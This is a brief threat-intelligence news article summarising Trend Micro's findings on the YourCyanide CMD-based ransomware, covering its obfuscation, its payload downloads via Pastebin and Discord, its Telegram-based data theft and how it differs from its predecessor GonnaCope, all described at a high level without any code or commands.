Trend Micro has been analyzing various CMD-based ransomware variants with sophisticated features. YourCyanide is the latest among these variants, which started with GonnaCope.
Diving into details
YourCyanide integrates Pastebin, Microsoft documents, and Discord links as part of its payload download mechanism.
With multiple obfuscation layers, the ransomware leverages custom environment variables, as well as the Enable Delayed Expansion function, to evade detection.
It, furthermore, passes through various files, downloads succeeding files via Pastebin and Discord, and ultimately downloads the final payload - to hide its activities.
As the ransomware is still under active development, it doesn’t encrypt anything.
It uses the Telegram chatbot API to pilfer information and sets it to a variable ‘webhook’.
Why this matters
While no encryption is performed, YourCyanide renames files; thus, inconveniencing users.
Moreover, as this ransomware is still being developed, the developers are finalizing the encryption routine.
It can propagate via email to different drives.
Variant comparison
The earliest version of YourCyanide, dubbed GonnaCope, was first spotted in April.
One prominent difference between the two variants is that GonnaCope does not assimilate user credentials from a list of applications and web browsers and does not enable RDP connections.
In addition to the above, the earliest version doesn’t execute black.bat - the file responsible for making the machine temporarily inaccessible while the payload is executed.
The bottom line
CMD-based ransomware strains are using heavily obfuscated scripts, resulting in low detection rates. While the technique is not new, the use of multi-layered obfuscation mechanisms enables the malware to hide easily. Ransomware strains with advanced capabilities are gaining popularity among cybercriminals. While YourCyanide has not emerged as a serious threat yet, further developments need to be tracked and blocked before causing any severe repercussions.